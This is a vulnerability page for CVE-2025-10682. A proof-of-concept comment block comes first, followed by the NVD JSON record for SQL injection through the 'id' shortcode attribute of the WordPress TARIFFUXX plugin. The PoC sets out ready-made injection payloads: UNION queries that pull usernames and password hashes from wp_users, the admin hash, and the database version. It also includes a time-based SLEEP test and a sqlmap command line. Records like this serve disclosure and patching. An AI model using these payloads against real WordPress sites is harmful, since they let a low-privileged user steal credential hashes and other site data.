CVE-2025-10682

/* * CVE-2025-10682 - TARIFFUXX Plugin SQL Injection PoC * Vulnerability: SQL Injection via 'tariffuxx_configurator' shortcode 'id' attribute * Affected: WordPress TARIFFUXX plugin <= 1.4 * Required: Contributor-level or above authentication */ // Example 1: Basic SQL Injection via shortcode // Attacker creates a post/page with the following shortcode: [tariffuxx_configurator id="1 UNION SELECT user_login,user_pass FROM wp_users-- "] // Example 2: Time-based blind SQL injection [tariffuxx_configurator id="1 AND (SELECT SLEEP(5))-- "] // Example 3: Extracting admin password hash [tariffuxx_configurator id="1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- "] // Example 4: Using sqlmap for automated exploitation // python sqlmap.py -u "http://target.com/?page_id=1" \ // --data="tariffuxx_configurator_id=1*" \ // --cookie="wordpress_logged_in_xxx=xxx" \ // --technique=BEUSTQ --dbms=mysql // Example 5: Extracting database version [tariffuxx_configurator id="1 UNION SELECT @@version,2,3-- "] // Note: The 'id' parameter in the shortcode is directly concatenated into SQL queries // without proper sanitization or parameterized queries, allowing SQL injection attacks.

{"cve": {"id": "CVE-2025-10682", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:41.327", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The TARIFFUXX plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4. This is due to insufficient neutralization of user-supplied input used directly in SQL queries. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject additional SQL into queries and extract sensitive information from the database via a crafted id attribute in the 'tariffuxx_configurator' shortcode."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tariffuxx/tags/1.4/classes/Tariffuxx_admin.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tariffuxx/tags/1.4/classes/Tariffuxx_twl.php#L164", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3465105/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e897a83b-d746-427d-8c31-64d4eab5848e?source=cve", "source": "[email protected]"}]}}